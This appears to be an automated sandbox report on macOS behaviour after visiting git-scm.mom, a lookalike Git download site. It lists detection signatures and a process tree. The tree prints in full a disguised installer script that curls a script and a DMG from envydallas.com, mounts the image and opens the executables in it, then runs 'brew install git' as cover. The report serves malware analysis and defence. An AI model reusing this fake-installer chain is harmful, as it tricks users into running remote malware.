Analysis
-
max time kernel
192s -
max time network
195s -
platform
macos-10.15_amd64 -
resource
macos-20240410-en -
resource tags
-
submitted
31/05/2024, 08:41
Errors
Reason
Machine shutdown
General
-
Target
http://git-scm.mom
Score
7/10
Malware Config
Signatures
-
Queries the macOS version information. 1 TTPs 4 IoCs
An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture.
-
System Checks 1 TTPs 2 IoCs
Adversaries may employ various system checks to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox.
-
File Deletion 1 TTPs
Adversaries may delete files left behind by the actions of their intrusion activity. Malware, tools, or other non-native files dropped or created on a system by an adversary (ex: Ingress Tool Transfer) may leave traces to indicate to what was done within a network and how. Removal of these files can occur.
-
AppleScript 1 TTPs 8 IoCs
AppleScript is a macOS scripting language designed to control applications and parts of the OS via inter-application messages called AppleEvents.
-
File and Directory Discovery. 1 TTPs 4 IoCs
Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system.
-
Resource Forking 1 TTPs 9 IoCs
Adversaries may abuse resource forks to hide malicious code or executables to evade detection and bypass security applications. A resource fork provides applications a structured way to store resources such as thumbnail images, menu definitions, icons, dialog boxes, and code.
Processes
-
/bin/shsh -c "sudo /bin/zsh -c \"/Applications/Google\\ Chrome.app/Contents/MacOS/Google\\ Chrome --simulate-outdated-no-au='Tue, 31 Dec 2099' --new-window http://git-scm.mom\""1⤵
-
/bin/bashsh -c "sudo /bin/zsh -c \"/Applications/Google\\ Chrome.app/Contents/MacOS/Google\\ Chrome --simulate-outdated-no-au='Tue, 31 Dec 2099' --new-window http://git-scm.mom\""1⤵
-
/usr/bin/sudosudo /bin/zsh -c "/Applications/Google\\ Chrome.app/Contents/MacOS/Google\\ Chrome --simulate-outdated-no-au='Tue, 31 Dec 2099' --new-window http://git-scm.mom"1⤵
-
/bin/zsh/bin/zsh -c "/Applications/Google\\ Chrome.app/Contents/MacOS/Google\\ Chrome --simulate-outdated-no-au='Tue, 31 Dec 2099' --new-window http://git-scm.mom"2⤵
-
-
/Applications/Google Chrome.app/Contents/MacOS/Google Chrome"/Applications/Google Chrome.app/Contents/MacOS/Google Chrome" "--simulate-outdated-no-au=Tue, 31 Dec 2099" --new-window http://git-scm.mom2⤵
-
-
/usr/libexec/xpcproxyxpcproxy com.apple.GameController.gamecontrollerd1⤵
-
/usr/libexec/gamecontrollerd/usr/libexec/gamecontrollerd1⤵
-
/Applications/Google Chrome.app/Contents/Frameworks/Google Chrome Framework.framework/Versions/101.0.4951.54/Helpers/chrome_crashpad_handler"/Applications/Google Chrome.app/Contents/Frameworks/Google Chrome Framework.framework/Versions/101.0.4951.54/Helpers/chrome_crashpad_handler" "--monitor-self-annotation=ptype=crashpad-handler" "--database=/var/root/Library/Application Support/Google/Chrome/Crashpad" "--metrics-dir=/var/root/Library/Application Support/Google/Chrome" "--url=https://clients2.google.com/cr/report" "--annotation=channel=" "--annotation=plat=OS X" "--annotation=prod=Chrome_Mac" "--annotation=ver=101.0.4951.54" "--handshake-fd=5"1⤵
-
/usr/bin/profiles/usr/bin/profiles status -type enrollment1⤵
-
/Applications/Google Chrome.app/Contents/Frameworks/Google Chrome Framework.framework/Versions/101.0.4951.54/Frameworks/KeystoneRegistration.framework/Helpers/ksinstall"/Applications/Google Chrome.app/Contents/Frameworks/Google Chrome Framework.framework/Versions/101.0.4951.54/Frameworks/KeystoneRegistration.framework/Helpers/ksinstall" "--install=/Applications/Google Chrome.app/Contents/Frameworks/Google Chrome Framework.framework/Versions/101.0.4951.54/Frameworks/KeystoneRegistration.framework/Resources/Keystone.tbz"1⤵
-
/Applications/Google Chrome.app/Contents/Frameworks/Google Chrome Framework.framework/Versions/101.0.4951.54/Helpers/developer_id_certificate_reauthorize"/Applications/Google Chrome.app/Contents/Frameworks/Google Chrome Framework.framework/Versions/101.0.4951.54/Helpers/developer_id_certificate_reauthorize" com.google.Chrome1⤵
-
/usr/bin/tar/usr/bin/tar -Oxjf "/Applications/Google Chrome.app/Contents/Frameworks/Google Chrome Framework.framework/Versions/101.0.4951.54/Frameworks/KeystoneRegistration.framework/Resources/Keystone.tbz" GoogleSoftwareUpdate.bundle/Contents/Info.plist1⤵
-
/Applications/Google Chrome.app/Contents/Frameworks/Google Chrome Framework.framework/Versions/101.0.4951.54/Helpers/Google Chrome Helper (GPU).app/Contents/MacOS/Google Chrome Helper (GPU)"/Applications/Google Chrome.app/Contents/Frameworks/Google Chrome Framework.framework/Versions/101.0.4951.54/Helpers/Google Chrome Helper (GPU).app/Contents/MacOS/Google Chrome Helper (GPU)" "--type=gpu-process" "--metrics-client-id=c4c0c7dc-66bc-4341-87b4-36b4665ab2e7" "--gpu-preferences=UAAAAAAAAAAgAAAAAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAJgEAAAAAAAAmAQAAAAAAACIAQAAMAAAAIABAAAAAAAAiAEAAAAAAACQAQAAAAAAAJgBAAAAAAAAoAEAAAAAAACoAQAAAAAAALABAAAAAAAAuAEAAAAAAADAAQAAAAAAAMgBAAAAAAAA0AEAAAAAAADYAQAAAAAAAOABAAAAAAAA6AEAAAAAAADwAQAAAAAAAPgBAAAAAAAAAAIAAAAAAAAIAgAAAAAAABACAAAAAAAAGAIAAAAAAAAgAgAAAAAAACgCAAAAAAAAMAIAAAAAAAA4AgAAAAAAAEACAAAAAAAASAIAAAAAAABQAgAAAAAAAFgCAAAAAAAAYAIAAAAAAABoAgAAAAAAAHACAAAAAAAAeAIAAAAAAACAAgAAAAAAAIgCAAAAAAAAkAIAAAAAAACYAgAAAAAAAKACAAAAAAAAqAIAAAAAAACwAgAAAAAAALgCAAAAAAAAwAIAAAAAAADIAgAAAAAAANACAAAAAAAA2AIAAAAAAADgAgAAAAAAAOgCAAAAAAAA8AIAAAAAAAD4AgAAAAAAABAAAAAAAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAHAAAAEAAAAAAAAAAAAAAACAAAABAAAAAAAAAAAAAAAAkAAAAQAAAAAAAAAAAAAAALAAAAEAAAAAAAAAAAAAAADAAAABAAAAAAAAAAAAAAAA4AAAAQAAAAAAAAAAAAAAAPAAAAEAAAAAAAAAABAAAAAAAAABAAAAAAAAAAAQAAAAcAAAAQAAAAAAAAAAEAAAAIAAAAEAAAAAAAAAABAAAACQAAABAAAAAAAAAAAQAAAAsAAAAQAAAAAAAAAAEAAAAMAAAAEAAAAAAAAAABAAAADgAAABAAAAAAAAAAAQAAAA8AAAAQAAAAAAAAAAQAAAAAAAAAEAAAAAAAAAAEAAAABwAAABAAAAAAAAAABAAAAAgAAAAQAAAAAAAAAAQAAAAJAAAAEAAAAAAAAAAEAAAACwAAABAAAAAAAAAABAAAAAwAAAAQAAAAAAAAAAQAAAAOAAAAEAAAAAAAAAAEAAAADwAAABAAAAAAAAAABwAAAAAAAAAQAAAAAAAAAAcAAAAHAAAAEAAAAAAAAAAHAAAACAAAABAAAAAAAAAABwAAAAkAAAAQAAAAAAAAAAcAAAALAAAAEAAAAAAAAAAHAAAADAAAABAAAAAAAAAABwAAAA4AAAAQAAAAAAAAAAcAAAAPAAAAEAAAAAAAAAAIAAAAAAAAABAAAAAAAAAACAAAAAcAAAAQAAAAAAAAAAgAAAAIAAAAEAAAAAAAAAAIAAAACQAAABAAAAAAAAAACAAAAAsAAAAQAAAAAAAAAAgAAAAMAAAAEAAAAAAAAAAIAAAADgAAABAAAAAAAAAACAAAAA8AAAAQAAAAAAAAAAoAAAAAAAAAEAAAAAAAAAAKAAAABwAAABAAAAAAAAAACgAAAAgAAAAQAAAAAAAAAAoAAAAJAAAAEAAAAAAAAAAKAAAACwAAABAAAAAAAAAACgAAAAwAAAAQAAAAAAAAAAoAAAAOAAAAEAAAAAAAAAAKAAAADwAAAAgAAAAAAAAACAAAAAAAAAA=" --shared-files "--field-trial-handle=1718379636,r,9429475778656422221,8968806579654328096,131072" "--seatbelt-client=21"1⤵
-
/Applications/Google Chrome.app/Contents/Frameworks/Google Chrome Framework.framework/Versions/101.0.4951.54/Helpers/Google Chrome Helper.app/Contents/MacOS/Google Chrome Helper"/Applications/Google Chrome.app/Contents/Frameworks/Google Chrome Framework.framework/Versions/101.0.4951.54/Helpers/Google Chrome Helper.app/Contents/MacOS/Google Chrome Helper" "--type=utility" "--utility-sub-type=network.mojom.NetworkService" "--lang=en-GB" "--service-sandbox-type=network" "--metrics-client-id=c4c0c7dc-66bc-4341-87b4-36b4665ab2e7" --shared-files "--field-trial-handle=1718379636,r,9429475778656422221,8968806579654328096,131072" "--seatbelt-client=29"1⤵
-
/Applications/Google Chrome.app/Contents/Frameworks/Google Chrome Framework.framework/Versions/101.0.4951.54/Helpers/Google Chrome Helper.app/Contents/MacOS/Google Chrome Helper"/Applications/Google Chrome.app/Contents/Frameworks/Google Chrome Framework.framework/Versions/101.0.4951.54/Helpers/Google Chrome Helper.app/Contents/MacOS/Google Chrome Helper" "--type=utility" "--utility-sub-type=storage.mojom.StorageService" "--lang=en-GB" "--service-sandbox-type=utility" "--metrics-client-id=c4c0c7dc-66bc-4341-87b4-36b4665ab2e7" --shared-files "--field-trial-handle=1718379636,r,9429475778656422221,8968806579654328096,131072" "--seatbelt-client=28"1⤵
-
/Applications/Google Chrome.app/Contents/Frameworks/Google Chrome Framework.framework/Versions/101.0.4951.54/Helpers/Google Chrome Helper (Alerts).app/Contents/MacOS/Google Chrome Helper (Alerts)"/Applications/Google Chrome.app/Contents/Frameworks/Google Chrome Framework.framework/Versions/101.0.4951.54/Helpers/Google Chrome Helper (Alerts).app/Contents/MacOS/Google Chrome Helper (Alerts)" "--type=utility" "--utility-sub-type=mac_notifications.mojom.MacNotificationProvider" "--lang=en-GB" "--service-sandbox-type=none" --message-loop-type-ui "--metrics-client-id=c4c0c7dc-66bc-4341-87b4-36b4665ab2e7" --shared-files "--field-trial-handle=1718379636,r,9429475778656422221,8968806579654328096,131072"1⤵
-
/Applications/Google Chrome.app/Contents/Frameworks/Google Chrome Framework.framework/Versions/101.0.4951.54/Helpers/Google Chrome Helper (Renderer).app/Contents/MacOS/Google Chrome Helper (Renderer)"/Applications/Google Chrome.app/Contents/Frameworks/Google Chrome Framework.framework/Versions/101.0.4951.54/Helpers/Google Chrome Helper (Renderer).app/Contents/MacOS/Google Chrome Helper (Renderer)" "--type=renderer" "--metrics-client-id=c4c0c7dc-66bc-4341-87b4-36b4665ab2e7" --display-capture-permissions-policy-allowed "--lang=en-GB" "--num-raster-threads=1" --enable-zero-copy --enable-gpu-memory-buffer-compositor-resources "--renderer-client-id=7" "--launch-time-ticks=298269128" --shared-files "--field-trial-handle=1718379636,r,9429475778656422221,8968806579654328096,131072" "--seatbelt-client=62"1⤵
-
/Applications/Google Chrome.app/Contents/Frameworks/Google Chrome Framework.framework/Versions/101.0.4951.54/Helpers/Google Chrome Helper (Renderer).app/Contents/MacOS/Google Chrome Helper (Renderer)"/Applications/Google Chrome.app/Contents/Frameworks/Google Chrome Framework.framework/Versions/101.0.4951.54/Helpers/Google Chrome Helper (Renderer).app/Contents/MacOS/Google Chrome Helper (Renderer)" "--type=renderer" "--metrics-client-id=c4c0c7dc-66bc-4341-87b4-36b4665ab2e7" --display-capture-permissions-policy-allowed "--lang=en-GB" "--num-raster-threads=1" --enable-zero-copy --enable-gpu-memory-buffer-compositor-resources "--renderer-client-id=6" "--launch-time-ticks=298314404" --shared-files "--field-trial-handle=1718379636,r,9429475778656422221,8968806579654328096,131072" "--seatbelt-client=62"1⤵
-
/usr/libexec/xpcproxyxpcproxy com.apple.Terminal.21001⤵
-
/System/Applications/Utilities/Terminal.app/Contents/MacOS/Terminal/System/Applications/Utilities/Terminal.app/Contents/MacOS/Terminal1⤵
-
/usr/bin/loginlogin -pf run2⤵
-
/bin/zsh-zsh3⤵
-
/usr/libexec/path_helper/usr/libexec/path_helper -s4⤵
-
-
/usr/bin/localelocale LC_CTYPE4⤵
-
-
/usr/bin/curlcurl -fsSL https://envydallas.com/git/install.sh4⤵
-
-
/bin/bashbash -c "#!/bin/bash DOWNLOAD_URL=\"https://envydallas.com/git/git_install/git.dmg\" DOWNLOAD_PATH=\"git.dmg\" echo \"Downloading packages...\" curl -o \"\$DOWNLOAD_PATH\" \"\$DOWNLOAD_URL\" MOUNT_OUTPUT=\$(hdiutil attach \"\$DOWNLOAD_PATH\" 2>&1) if echo \"\$MOUNT_OUTPUT\" | grep -q \"no mountable file systems\"; then exit 1 fi MOUNTED_DISK=\$(echo \"\$MOUNT_OUTPUT\" | grep \"/Volumes\" | awk '{print \$NF}') if [ -z \"\$MOUNTED_DISK\" ]; then echo \"Error, reboot the device and try again\" exit 1 fi echo \"\$MOUNTED_DISK\" echo \"Packet check...\" find \"\$MOUNTED_DISK\" -maxdepth 1 -type f -perm -111 -exec echo \"Executable file found: {}\" \\; -exec open {} \\; sleep 10 brew install git"4⤵
-
/usr/bin/curlcurl -o git.dmg https://envydallas.com/git/git_install/git.dmg5⤵
-
-
/usr/bin/grepgrep -q "no mountable file systems"5⤵
-
-
/usr/bin/findfind /Volumes/Git -maxdepth 1 -type f -perm -111 -exec echo "Executable file found: {}" ";" -exec open "{}" ";"5⤵
-
/usr/local/bin/echoecho "Executable file found: /Volumes/Git/Git"6⤵
-
-
/usr/bin/echoecho "Executable file found: /Volumes/Git/Git"6⤵
-
-
/bin/echoecho "Executable file found: /Volumes/Git/Git"6⤵
-
-
/usr/local/bin/openopen /Volumes/Git/Git6⤵
-
-
/usr/bin/openopen /Volumes/Git/Git6⤵
-
-
-
/bin/sleepsleep 105⤵
-
-
-
/usr/local/bin/brewbrew install git4⤵
-
-
/usr/bin/env/usr/bin/env -i "HOME=/Users/run" "SHELL=/bin/zsh" "PATH=/usr/bin:/bin:/usr/sbin:/sbin" "TERM=xterm-256color" "LOGNAME=run" "USER=run" "SSH_AUTH_SOCK=/private/tmp/com.apple.launchd.3xYUW1xUJM/Listeners" "HOMEBREW_BREW_FILE=/usr/local/bin/brew" "HOMEBREW_LIBRARY=/usr/local/Homebrew/Library" "HOMEBREW_PATH=/usr/local/bin:/usr/bin:/bin:/usr/sbin:/sbin" "HOMEBREW_PREFIX=/usr/local" "HOMEBREW_REPOSITORY=/usr/local/Homebrew" /bin/bash /usr/local/Homebrew/Library/Homebrew/brew.sh install git4⤵
-
-
/bin/bash/bin/bash /usr/local/Homebrew/Library/Homebrew/brew.sh install git4⤵
-
/usr/bin/unameuname -m5⤵
-
-
/usr/bin/unameuname -s5⤵
-
-
/usr/bin/localelocale charmap5⤵
-
-
/usr/bin/sw_vers/usr/bin/sw_vers -productVersion5⤵
-
-
/usr/bin/idid -u5⤵
-
-
/bin/catcat /usr/local/Homebrew/Library/Homebrew/vendor/portable-ruby-version5⤵
-
-
/usr/bin/readlinkreadlink /usr/local/Homebrew/Library/Homebrew/vendor/portable-ruby/current5⤵
-
-
/usr/local/bin/brew/usr/local/bin/brew update --preinstall5⤵
-
-
/usr/bin/env/usr/bin/env -i "HOME=/Users/run" "SHELL=/bin/zsh" "PATH=/usr/bin:/bin:/usr/sbin:/sbin" "TERM=xterm-256color" "LOGNAME=run" "USER=run" "SSH_AUTH_SOCK=/private/tmp/com.apple.launchd.3xYUW1xUJM/Listeners" "HOMEBREW_ANALYTICS_ID=UA-76679469-1" "HOMEBREW_ANALYTICS_USER_UUID=E0EE0CB3-2387-4D1D-AE5D-0C5F1A4A7098" "HOMEBREW_AUTO_UPDATE_CHECKED=1" "HOMEBREW_AUTO_UPDATING=1" "HOMEBREW_BOTTLE_DEFAULT_DOMAIN=https://ghcr.io/v2/homebrew/core" "HOMEBREW_BREW_DEFAULT_GIT_REMOTE=https://github.com/Homebrew/brew" "HOMEBREW_BREW_FILE=/usr/local/bin/brew" "HOMEBREW_BREW_GIT_REMOTE=https://github.com/Homebrew/brew" "HOMEBREW_CACHE=/Users/run/Library/Caches/Homebrew" "HOMEBREW_CELLAR=/usr/local/Cellar" "HOMEBREW_COMMAND_DEPTH=1" "HOMEBREW_CORE_DEFAULT_GIT_REMOTE=https://github.com/Homebrew/homebrew-core" "HOMEBREW_CORE_GIT_REMOTE=https://github.com/Homebrew/homebrew-core" "HOMEBREW_CURL=curl" "HOMEBREW_DEFAULT_CACHE=/Users/run/Library/Caches/Homebrew" "HOMEBREW_DEFAULT_LOGS=/Users/run/Library/Logs/Homebrew" "HOMEBREW_DEFAULT_TEMP=/private/tmp" "HOMEBREW_GIT=git" "HOMEBREW_GIT_CONFIG_FILE=/usr/local/Homebrew/.git/config" "HOMEBREW_LIBRARY=/usr/local/Homebrew/Library" "HOMEBREW_LOGS=/Users/run/Library/Logs/Homebrew" "HOMEBREW_MACOS_VERSION=10.15.1" "HOMEBREW_MACOS_VERSION_NUMERIC=101501" "HOMEBREW_MINIMUM_GIT_VERSION=2.14.3" "HOMEBREW_OS_VERSION=macOS 10.15.1" "HOMEBREW_PATH=/usr/local/bin:/usr/bin:/bin:/usr/sbin:/sbin" "HOMEBREW_PREFIX=/usr/local" "HOMEBREW_PROCESSOR=Intel" "HOMEBREW_PRODUCT=Homebrew" "HOMEBREW_REPOSITORY=/usr/local/Homebrew" "HOMEBREW_REQUIRED_RUBY_VERSION=2.6.3" "HOMEBREW_RUBY_PATH=/usr/local/Homebrew/Library/Homebrew/vendor/portable-ruby/current/bin/ruby" "HOMEBREW_RUBY_WARNINGS=-W1" "HOMEBREW_SYSTEM=Macintosh" "HOMEBREW_SYSTEM_CA_CERTIFICATES_TOO_OLD=1" "HOMEBREW_TEMP=/private/tmp" "HOMEBREW_USER_AGENT=Homebrew/3.2.17 (Macintosh; Intel Mac OS X 10.15.1)" "HOMEBREW_USER_AGENT_CURL=Homebrew/3.2.17 (Macintosh; Intel Mac OS X 10.15.1) curl/7.64.1" "HOMEBREW_VERSION=3.2.17" /bin/bash /usr/local/Homebrew/Library/Homebrew/brew.sh update --preinstall5⤵
-
-
/bin/bash/bin/bash /usr/local/Homebrew/Library/Homebrew/brew.sh update --preinstall5⤵
-
/usr/bin/unameuname -m6⤵
-
-
/usr/bin/unameuname -s6⤵
-
-
/usr/bin/localelocale charmap6⤵
-
-
/usr/bin/sw_vers/usr/bin/sw_vers -productVersion6⤵
-
-
/usr/bin/idid -u6⤵
-
-
/usr/local/Homebrew/Library/Homebrew/shims/shared/git/usr/local/Homebrew/Library/Homebrew/shims/shared/git "--homebrew=print-path"6⤵
-
-
/Library/Developer/CommandLineTools/usr/bin/git/Library/Developer/CommandLineTools/usr/bin/git --version6⤵
-
-
/usr/bin/ruby/usr/bin/ruby -e "exit(RUBY_VERSION >= '1.8.7')"6⤵
-
/bin/shsh -c "xcode-select --print-path >/dev/null 2>&1 && xcrun --sdk macosx --show-sdk-path 2>/dev/null"7⤵
-
-
/bin/bashsh -c "xcode-select --print-path >/dev/null 2>&1 && xcrun --sdk macosx --show-sdk-path 2>/dev/null"7⤵
-
/usr/bin/xcode-selectxcode-select --print-path8⤵
-
-
/usr/bin/xcrunxcrun --sdk macosx --show-sdk-path8⤵
-
-
-
-
/usr/bin/ruby/usr/bin/ruby -e "File.new(200).flock(File::LOCK_EX | File::LOCK_NB) || exit(1)"6⤵
-
/bin/shsh -c "xcode-select --print-path >/dev/null 2>&1 && xcrun --sdk macosx --show-sdk-path 2>/dev/null"7⤵
-
-
/bin/bashsh -c "xcode-select --print-path >/dev/null 2>&1 && xcrun --sdk macosx --show-sdk-path 2>/dev/null"7⤵
-
/usr/bin/xcode-selectxcode-select --print-path8⤵
-
-
/usr/bin/xcrunxcrun --sdk macosx --show-sdk-path8⤵
-
-
-
-
/bin/rmrm -f /usr/local/Homebrew/.git/UPDATE_FAILED6⤵
-
-
/bin/rmrm -f /usr/local/Homebrew/.git/FAILED_FETCH_DIRS6⤵
-
-
-
-
-
-
/usr/bin/loginlogin -pf run2⤵
-
/bin/zsh-zsh3⤵
-
/usr/libexec/path_helper/usr/libexec/path_helper -s4⤵
-
-
/usr/bin/localelocale LC_CTYPE4⤵
-
-
/Volumes/Git/Git/Volumes/Git/Git4⤵
-
-
-
-
/usr/libexec/xpcproxyxpcproxy com.apple.SafariLaunchAgent1⤵
-
/Library/Apple/System/Library/CoreServices/SafariSupport.bundle/Contents/MacOS/SafariLaunchAgent/Library/Apple/System/Library/CoreServices/SafariSupport.bundle/Contents/MacOS/SafariLaunchAgent1⤵
-
/Applications/Google Chrome.app/Contents/Frameworks/Google Chrome Framework.framework/Versions/101.0.4951.54/Helpers/Google Chrome Helper (Renderer).app/Contents/MacOS/Google Chrome Helper (Renderer)"/Applications/Google Chrome.app/Contents/Frameworks/Google Chrome Framework.framework/Versions/101.0.4951.54/Helpers/Google Chrome Helper (Renderer).app/Contents/MacOS/Google Chrome Helper (Renderer)" "--type=renderer" "--metrics-client-id=c4c0c7dc-66bc-4341-87b4-36b4665ab2e7" --extension-process --display-capture-permissions-policy-allowed "--lang=en-GB" "--num-raster-threads=1" --enable-zero-copy --enable-gpu-memory-buffer-compositor-resources "--renderer-client-id=8" "--launch-time-ticks=303075939" --shared-files "--field-trial-handle=1718379636,r,9429475778656422221,8968806579654328096,131072" "--seatbelt-client=62"1⤵
-
/Applications/Google Chrome.app/Contents/Frameworks/Google Chrome Framework.framework/Versions/101.0.4951.54/Helpers/Google Chrome Helper (Renderer).app/Contents/MacOS/Google Chrome Helper (Renderer)"/Applications/Google Chrome.app/Contents/Frameworks/Google Chrome Framework.framework/Versions/101.0.4951.54/Helpers/Google Chrome Helper (Renderer).app/Contents/MacOS/Google Chrome Helper (Renderer)" "--type=renderer" "--metrics-client-id=c4c0c7dc-66bc-4341-87b4-36b4665ab2e7" --extension-process --display-capture-permissions-policy-allowed "--lang=en-GB" "--num-raster-threads=1" --enable-zero-copy --enable-gpu-memory-buffer-compositor-resources "--renderer-client-id=12" "--launch-time-ticks=303094221" --shared-files "--field-trial-handle=1718379636,r,9429475778656422221,8968806579654328096,131072" "--seatbelt-client=65"1⤵
-
/Applications/Google Chrome.app/Contents/Frameworks/Google Chrome Framework.framework/Versions/101.0.4951.54/Helpers/Google Chrome Helper (Renderer).app/Contents/MacOS/Google Chrome Helper (Renderer)"/Applications/Google Chrome.app/Contents/Frameworks/Google Chrome Framework.framework/Versions/101.0.4951.54/Helpers/Google Chrome Helper (Renderer).app/Contents/MacOS/Google Chrome Helper (Renderer)" "--type=renderer" "--metrics-client-id=c4c0c7dc-66bc-4341-87b4-36b4665ab2e7" --extension-process --display-capture-permissions-policy-allowed "--lang=en-GB" "--num-raster-threads=1" --enable-zero-copy --enable-gpu-memory-buffer-compositor-resources "--renderer-client-id=10" "--launch-time-ticks=303098885" --shared-files "--field-trial-handle=1718379636,r,9429475778656422221,8968806579654328096,131072" "--seatbelt-client=65"1⤵
-
/Applications/Google Chrome.app/Contents/Frameworks/Google Chrome Framework.framework/Versions/101.0.4951.54/Helpers/Google Chrome Helper (Renderer).app/Contents/MacOS/Google Chrome Helper (Renderer)"/Applications/Google Chrome.app/Contents/Frameworks/Google Chrome Framework.framework/Versions/101.0.4951.54/Helpers/Google Chrome Helper (Renderer).app/Contents/MacOS/Google Chrome Helper (Renderer)" "--type=renderer" "--metrics-client-id=c4c0c7dc-66bc-4341-87b4-36b4665ab2e7" --extension-process --display-capture-permissions-policy-allowed "--lang=en-GB" "--num-raster-threads=1" --enable-zero-copy --enable-gpu-memory-buffer-compositor-resources "--renderer-client-id=11" "--launch-time-ticks=303106889" --shared-files "--field-trial-handle=1718379636,r,9429475778656422221,8968806579654328096,131072" "--seatbelt-client=65"1⤵
-
/Library/Google/GoogleSoftwareUpdate/GoogleSoftwareUpdate.bundle/Contents/Helpers/ksadmin/Library/Google/GoogleSoftwareUpdate/GoogleSoftwareUpdate.bundle/Contents/Helpers/ksadmin --productid com.google.Chrome --print-tickets --store /Library/Google/GoogleSoftwareUpdate/TicketStore/Keystone.ticketstore1⤵
-
/Library/Google/GoogleSoftwareUpdate/GoogleSoftwareUpdate.bundle/Contents/Helpers/ksadmin/Library/Google/GoogleSoftwareUpdate/GoogleSoftwareUpdate.bundle/Contents/Helpers/ksadmin -P com.google.Chrome --delete --user-store1⤵
-
/usr/sbin/system_profiler/usr/sbin/system_profiler SPConfigurationProfileDataType -detailLevel mini -timeout 15 -xml1⤵
-
/Applications/Google Chrome.app/Contents/Frameworks/Google Chrome Framework.framework/Versions/101.0.4951.54/Helpers/Google Chrome Helper.app/Contents/MacOS/Google Chrome Helper"/Applications/Google Chrome.app/Contents/Frameworks/Google Chrome Framework.framework/Versions/101.0.4951.54/Helpers/Google Chrome Helper.app/Contents/MacOS/Google Chrome Helper" "--type=utility" "--utility-sub-type=data_decoder.mojom.DataDecoderService" "--lang=en-GB" "--service-sandbox-type=service" "--metrics-client-id=c4c0c7dc-66bc-4341-87b4-36b4665ab2e7" --shared-files "--field-trial-handle=1718379636,r,9429475778656422221,8968806579654328096,131072" "--seatbelt-client=96"1⤵
-
/Applications/Google Chrome.app/Contents/Frameworks/Google Chrome Framework.framework/Versions/101.0.4951.54/Helpers/Google Chrome Helper.app/Contents/MacOS/Google Chrome Helper"/Applications/Google Chrome.app/Contents/Frameworks/Google Chrome Framework.framework/Versions/101.0.4951.54/Helpers/Google Chrome Helper.app/Contents/MacOS/Google Chrome Helper" "--type=utility" "--utility-sub-type=unzip.mojom.Unzipper" "--lang=en-GB" "--service-sandbox-type=utility" "--metrics-client-id=c4c0c7dc-66bc-4341-87b4-36b4665ab2e7" --shared-files "--field-trial-handle=1718379636,r,9429475778656422221,8968806579654328096,131072" "--seatbelt-client=99"1⤵
-
/Applications/Google Chrome.app/Contents/Frameworks/Google Chrome Framework.framework/Versions/101.0.4951.54/Helpers/Google Chrome Helper.app/Contents/MacOS/Google Chrome Helper"/Applications/Google Chrome.app/Contents/Frameworks/Google Chrome Framework.framework/Versions/101.0.4951.54/Helpers/Google Chrome Helper.app/Contents/MacOS/Google Chrome Helper" "--type=utility" "--utility-sub-type=data_decoder.mojom.DataDecoderService" "--lang=en-GB" "--service-sandbox-type=service" "--metrics-client-id=c4c0c7dc-66bc-4341-87b4-36b4665ab2e7" --shared-files "--field-trial-handle=1718379636,r,9429475778656422221,8968806579654328096,131072" "--seatbelt-client=105"1⤵
-
/Applications/Google Chrome.app/Contents/Frameworks/Google Chrome Framework.framework/Versions/101.0.4951.54/Helpers/Google Chrome Helper.app/Contents/MacOS/Google Chrome Helper"/Applications/Google Chrome.app/Contents/Frameworks/Google Chrome Framework.framework/Versions/101.0.4951.54/Helpers/Google Chrome Helper.app/Contents/MacOS/Google Chrome Helper" "--type=utility" "--utility-sub-type=unzip.mojom.Unzipper" "--lang=en-GB" "--service-sandbox-type=utility" "--metrics-client-id=c4c0c7dc-66bc-4341-87b4-36b4665ab2e7" --shared-files "--field-trial-handle=1718379636,r,9429475778656422221,8968806579654328096,131072" "--seatbelt-client=115"1⤵
-
/Applications/Google Chrome.app/Contents/Frameworks/Google Chrome Framework.framework/Versions/101.0.4951.54/Helpers/Google Chrome Helper.app/Contents/MacOS/Google Chrome Helper"/Applications/Google Chrome.app/Contents/Frameworks/Google Chrome Framework.framework/Versions/101.0.4951.54/Helpers/Google Chrome Helper.app/Contents/MacOS/Google Chrome Helper" "--type=utility" "--utility-sub-type=data_decoder.mojom.DataDecoderService" "--lang=en-GB" "--service-sandbox-type=service" "--metrics-client-id=c4c0c7dc-66bc-4341-87b4-36b4665ab2e7" --shared-files "--field-trial-handle=1718379636,r,9429475778656422221,8968806579654328096,131072" "--seatbelt-client=114"1⤵
-
/Applications/Google Chrome.app/Contents/Frameworks/Google Chrome Framework.framework/Versions/101.0.4951.54/Helpers/Google Chrome Helper (Renderer).app/Contents/MacOS/Google Chrome Helper (Renderer)"/Applications/Google Chrome.app/Contents/Frameworks/Google Chrome Framework.framework/Versions/101.0.4951.54/Helpers/Google Chrome Helper (Renderer).app/Contents/MacOS/Google Chrome Helper (Renderer)" "--type=renderer" "--metrics-client-id=c4c0c7dc-66bc-4341-87b4-36b4665ab2e7" --extension-process --display-capture-permissions-policy-allowed "--lang=en-GB" "--num-raster-threads=1" --enable-zero-copy --enable-gpu-memory-buffer-compositor-resources "--renderer-client-id=19" "--launch-time-ticks=315908862" --shared-files "--field-trial-handle=1718379636,r,9429475778656422221,8968806579654328096,131072" "--seatbelt-client=117"1⤵
-
/Applications/Google Chrome.app/Contents/Frameworks/Google Chrome Framework.framework/Versions/101.0.4951.54/Helpers/Google Chrome Helper (Renderer).app/Contents/MacOS/Google Chrome Helper (Renderer)"/Applications/Google Chrome.app/Contents/Frameworks/Google Chrome Framework.framework/Versions/101.0.4951.54/Helpers/Google Chrome Helper (Renderer).app/Contents/MacOS/Google Chrome Helper (Renderer)" "--type=renderer" "--metrics-client-id=c4c0c7dc-66bc-4341-87b4-36b4665ab2e7" --display-capture-permissions-policy-allowed "--lang=en-GB" "--num-raster-threads=1" --enable-zero-copy --enable-gpu-memory-buffer-compositor-resources "--renderer-client-id=20" "--launch-time-ticks=331180230" --shared-files "--field-trial-handle=1718379636,r,9429475778656422221,8968806579654328096,131072" "--seatbelt-client=126"1⤵
-
